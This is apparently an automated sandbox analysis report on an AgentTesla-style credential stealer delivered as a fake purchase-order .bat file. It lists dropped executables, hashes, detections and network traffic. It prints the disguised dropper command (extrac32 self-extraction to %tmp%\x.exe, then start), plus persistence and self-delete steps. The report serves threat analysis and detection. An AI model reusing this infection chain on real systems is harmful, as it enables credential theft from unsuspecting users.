                                                                                                            SHA-256:BB35018A03489EAF60F9453B0A49A8D09910AFF0545D24CCF4DBB9F04B758DDC
                                                                                                            SHA-512:A89EC897BCC3565E67F8FB7C0A70D0C1FD441221EA93045CC502C5C9CCA6E492E8C5F84D632E439E7159355A45AFC735C477AA83774363CB316D2EE7FAF58A96
                                                                                                            Malicious:true
                                                                                                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=910110..HotKey=84..
                                                                                                            Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):236544
                                                                                                            Entropy (8bit):6.4416694948877025
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                            MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                            SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                            SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):18944
                                                                                                            Entropy (8bit):5.742964649637377
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                            MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                            SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                            SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                            SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):410
                                                                                                            Entropy (8bit):5.361827289088002
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                            MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                            SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                            SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                            SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):410
                                                                                                            Entropy (8bit):5.361827289088002
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                            MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                            SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                            SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                            SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2232
                                                                                                            Entropy (8bit):5.379938008936079
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:wWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyufF:wLHyIFKL3IZ2KRH9OugbfF
                                                                                                            MD5:C1B45B8B73E216268DDF7684520AD730
                                                                                                            SHA1:E577092396C480E98A03E10BB0CA3ED36135A864
                                                                                                            SHA-256:4E5A18090B1DBD9600A0447927A5487353F793A9DADA36D38671EDFF25B81897
                                                                                                            SHA-512:7AE4AEB38712B1AC3E7C4249FC540BAFA20A2A37D98EEB79862C0CB3562EACFB217691CA69598187191A316C8C2CB978E6562DFD547395AD6B956F63EF3C5105
                                                                                                            Malicious:false
                                                                                                            Preview:@...e.................................X..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):250368
                                                                                                            Entropy (8bit):5.008874766930935
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
                                                                                                            MD5:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                            SHA1:392D68C000137B8039155DF6BB331D643909E7E7
                                                                                                            SHA-256:DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
                                                                                                            SHA-512:9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.|........................................
                                                                                                            Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:modified
                                                                                                            Size (bytes):231936
                                                                                                            Entropy (8bit):5.039764014369673
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                            MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                            SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                            SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                            SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):160
                                                                                                            Entropy (8bit):5.036890143780922
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:mKDDCMNvFbuov3DMERE2J5xAIJWAdEFKDwU1hGDMERE2J5xAInTRIJvO+BQty:hWKdbuoLFi23fJWAawDNeFi23fTI
                                                                                                            MD5:56757CD24E4B383D9E74CFEA2267724E
                                                                                                            SHA1:FE98E3B69687E714DD1708D3C313078A7283E37E
                                                                                                            SHA-256:4796F07C1E14015E91E10451052CFD62AA37303B37A47EA0C1991C5594F364D8
                                                                                                            SHA-512:3936DB6CE99B34C3A65EE0F64BABD0F91ACE56FFF496964F9E1EB70852E9AA60FEFF3008AEB087E40C22B731822A96488A1AFC251FEB42FEF78ADA7B16F604CE
                                                                                                            Malicious:false
                                                                                                            Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpFF65.tmp.cmd" /f /q..
                                                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1392640
                                                                                                            Entropy (8bit):7.401846851033825
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:in5YMTKJPtU65L4oU78G6Hd8b2s17EeL4fFyV2vkSotd/ADgKczxj5z:wzGSkfQJSgK
                                                                                                            MD5:67DAC6AE9EE770115DB85CC71979DC41
                                                                                                            SHA1:A708539EBB312329F56F064A8491E4C6E1BD7CE8
                                                                                                            SHA-256:054899796D592BB5F70B0A9FA28429024A919270A76603626BE24068FAAE59D9
                                                                                                            SHA-512:9FF88C70D4A2F7628A2F853D576B8E7D7EBF3409DE13D56895A06EB2FDC827BEEF45EC982DBC69A9577ED78D27D44F5DF2284CDF614BA4DEBADAF74CD07C204D
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........x............@..............................................@...............................'...P...........................r..................................................h...<............................text....Z.......\.................. ..`.itext..L....p.......`.............. ..`.data...............j..............@....bss.....6...@....... ...................idata...'.......(... ..............@....tls....4............H...................rdata...............H..............@..@.reloc...r.......t...J..............@..B.rsrc........P......................@..@.....................@..............@..@................................................................................................
                                                                                                            Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):12320
                                                                                                            Entropy (8bit):7.986212823428834
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:9YA8pnbt1Q3xMP2jV3n7ScR4eqUAWS9PPxc:9YDtiyPcrbRz2xPq
                                                                                                            MD5:CF0E5F832B81A1EECF0CBD52FB761470
                                                                                                            SHA1:381771F658BC169A5D5A70AD6ED744763F2A8A20
                                                                                                            SHA-256:96A73FA0DA103FAA180E95C7C57100B8E784D26916FE8800946E5AB5145325B1
                                                                                                            SHA-512:FF25D2B6CEF2E5E404773D0F9BDC08E53A55D9743394264CFAEBF0C422698C06D11A1F02D365D3BF721204D31B5CDECC255DA91ACA2A4ED5065F6BE852681E14
                                                                                                            Malicious:false
                                                                                                            Preview:.......PNN._Q........~.o........0t....\t.A.v..B...L2..F..Yy-``.NI..x.L.b.A.]l..$....cn4...a6.;.y....`g.f.g.;.;.......]&`.<V.\j.|..[.....j..gf...........3.[}.....U.}....7x.&h.1.P..V..X.*&..h...9..G.....&*i......{sUB....r.....2..DI..#$T..S"=y..}C.B+.MsZ@t...N".....p..>.n.......X...........T.c.....@i......O./h6.PG.R5..........:...]..b......'..]....... .l:,/}..G.k@vX......t....t..P.K.._l..[.Q$.9.-.^..W>.<.......x$=.....~.Uu8P...m..bE*=.Y.j6n.u$...LJ..EY.^]CT.}.O..%.D._.c1.M....Y....o?3..[J....%.a:......_......1.?U. .......ei..Y?@d.h.xt.B&.2...W..-.....R.<..X"4.AM..~...............B..X.].B.|.I..3...:.p..6z.=.R.m. {r..,.._]=t.7.+`+R...._....n|...|....Tq..o+%+)J....J.:./.......(.8......A[.y.6E..o.D.Nz...~.h.......Hx..',k..|.>zp?\..q..~....j.i9V..b...m.5h....-....'7..A.... .J..T....'..b3KH..../....n.....?.~.D........L../Ud4._...`XMp/..Sk..A.!....d.A+.1&...nstC.......]Ie.....?.Mf.;W..d$.=....X.U.l.q..8j.OOyi+....n3p...O..c.@...3.z....j1T.N....
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):231936
                                                                                                            Entropy (8bit):5.039764014369673
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                            MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                            SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                            SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                            SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Nov 21 15:00:25 2024, mtime=Thu Nov 21 15:00:25 2024, atime=Thu Nov 21 15:00:23 2024, length=231936, window=
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1788
                                                                                                            Entropy (8bit):3.524958153788847
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:8rgHzgbSVI/WILSFt2wLbMA0s4FSnylwO4ZTqlSxBscm:8rgHMoIWILSewLbLx4+ylwZTqlSrsc
                                                                                                            MD5:048E561D5EE805688C117B50FF1EBCFF
                                                                                                            SHA1:4264A13A366A26F7EA5CE9BAA1E7F9C1CEAAE4AC
                                                                                                            SHA-256:AF582B2A54C9C0A96CC9FA505BC2450B23DD8E9B9ACADA9ADAE90D0D28E9132D
                                                                                                            SHA-512:B2ABD215430FD61E1C201D250CDC871D62AD1D82492D3866C533DE89BE6AD046EA31D633F7C4BFC115C370B06EEF1F5B5ECE5B3AF2540A4D1EF2777A8C247CFC
                                                                                                            Malicious:false
                                                                                                            Preview:L..................F.@.. ...._.z.<...z.<..Xk.y.<............................:..DG..Yr?.D..U..k0.&...&.........5q......l.<...z.<......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)NuY.............................c..A.p.p.D.a.t.a...B.V.1.....uY....Roaming.@......EW)NuY.............................5..R.o.a.m.i.n.g.....T.1.....uY....ACCApi..>......uY..uY...............................A.C.C.A.p.i.....l.2.....uY.. .TROJAN~1.EXE..P......uY..uY.............................C.T.r.o.j.a.n.A.I.b.o.t...e.x.e.......c...............-.......b..............t.....C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e./.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe..................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):591
                                                                                                            Entropy (8bit):4.634489914013821
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:qaZ/xTzP1eSbZ7u0wxDDDDDDDDjCaY5eUaYAQUTB8NGNn+:B/xTzdp7u0wQakJaBt8NN
                                                                                                            MD5:E85C6CC551B03AB5AF64DA333B31E7C9
                                                                                                            SHA1:E0157A3D2D6841D66D3C1BBCDBB87C32C0AFD9CF
                                                                                                            SHA-256:BC0D47450D402DAF0FEFACA8170EA04323021272C35D4A52D83ECA72F6434624
                                                                                                            SHA-512:AE9248D83D0D753AE156E8862F3EECE335EC5E7587552EB928DB05EAEEA2630296B1BF9A66CCBB4B5E21C42615F421CCB0E7F68E934466F5392003067FFFA186
                                                                                                            Malicious:false
                                                                                                            Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x154000 (1392640) (1 MB)....Total bytes written = 0x154000 (1392640) (1 MB).......Operation completed successfully in 0.390 seconds.....
                                                                                                            Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                            Category:dropped
                                                                                                            Size (bytes):66
                                                                                                            Entropy (8bit):4.524640141725149
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                                            MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                                            SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                                            SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                                            SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                                            Malicious:false
                                                                                                            Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..
                                                                                                            File type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 43 datablocks, 0 compression
                                                                                                            Entropy (8bit):7.401349657402711
                                                                                                            TrID:
                                                                                                            • Microsoft Cabinet Archive (8008/1) 99.91%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                                                                            File name:RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat
                                                                                                            File size:1'393'123 bytes
                                                                                                            MD5:ae6a8a43561ba85215f8b9986001a520
                                                                                                            SHA1:08d50775b58ae5f13b971a674e7799477a5bd00c
                                                                                                            SHA256:a0b4998d451f008fd7f752ef86b9a7306684f9193f07db1986273727636da61e
                                                                                                            SHA512:fee4e837fc1848addf0bc5431d8df3807f74dede3c685913a18ce193fb5ad6cf9090448ac024890e4dbe7b3eec19b076fde5559079b366238e73108103878f5f
                                                                                                            SSDEEP:24576:An9YMTuJTJU65LUoUf8G6HxQ/2sB7oeLQzFyt27kycNFDUDMeYf1f53:WzuS8zA1mMe
                                                                                                            TLSH:4E558D3AD2418F35DB3A25394D4A72ACC758DD741823674F12B0B8D6AB341BB9F5C28E
                                                                                                            File Content Preview:MSCF............u.......................+.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".....@............ .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und
                                                                                                            Icon Hash:9686878b929a9886
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-11-21T17:00:13.455183+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049713198.252.105.91443TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 21, 2024 17:00:11.985930920 CET49712443192.168.2.10198.252.105.91
                                                                                                            Nov 21, 2024 17:00:11.985985994 CET44349712198.252.105.91192.168.2.10
                                                                                                            Nov 21, 2024 17:00:11.986154079 CET49712443192.168.2.10198.252.105.91
                                                                                                            Nov 21, 2024 17:00:11.986387014 CET49712443192.168.2.10198.252.105.91
                                                                                                            Nov 21, 2024 17:00:11.986474037 CET44349712198.252.105.91192.168.2.10
                                                                                                            Nov 21, 2024 17:00:11.986958027 CET49712443192.168.2.10198.252.105.91
                                                                                                            Nov 21, 2024 17:00:12.049181938 CET49713443192.168.2.10198.252.105.91
                                                                                                            Nov 21, 2024 17:00:12.049228907 CET44349713198.252.105.91192.168.2.10
                                                                                                            Nov 21, 2024 17:00:12.049348116 CET49713443192.168.2.10198.252.105.91
